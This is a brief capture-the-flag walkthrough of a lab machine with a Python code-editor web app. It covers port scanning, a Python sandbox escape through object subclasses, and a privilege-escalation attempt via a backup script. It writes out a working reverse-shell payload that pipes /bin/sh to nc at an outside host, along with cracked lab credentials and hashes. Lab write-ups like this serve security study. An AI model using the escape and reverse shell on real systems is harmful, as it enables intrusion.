Code
Enumeration
Nmap
nmap -p- --open -sCV --top-ports 500 10.10.11.62
#########################################################
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4We can see it have ssh port open and a web service Gunicorn 20.0.4 open into 5000 port
Basic virtual hosting code.htb to this ip, add it into /etc/hosts
Web
Python Code Editor... JUM...
So, i can try to senf a RCE of python use the https://www.revshells.com/ but... nothing of its work, we need search.
We need try break Python 3 eval protections... Before investigate i locate this website:
Explotation
With it we can see the subclasses used into this website
print([].__class__.__base__.__subclasses__())
After search, read and speak with Chatgpt i can optain a way to get a revershell -->
## RS
().__class__.__bases__[0].__subclasses__()[317](['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.172 1234 >/tmp/f'], shell=True)
## NC connection
nc -nlvp 1234
User Flag
With it we can optain the user flag into /home
Now, intro app-production we have a folder with name /app/instance and it contain a database.db
We can optain two user hashes, go to crackstation for example -->
Mmartin3de6f30c4a09c27fc71932bfc68474be/
#Mdevelopment759b74ce43947f5f4c91aeddc3e5bad3
Both use MD5, and we can optains both passwod
martin:nafeelswordsmaster
Root Flag
I need do the treatment of TTy
We can see the martin user can use /usr/bin/backy.sh who root, so, befoure execute it, it solicte us a task.json
I wil try to modify task.json and call the /root directory to do a backup of all directory
JUm... now it try to parh traversal -->
Execute and FAIL
We nee deleate into the code the carible exclude, give us problem -->
Last updated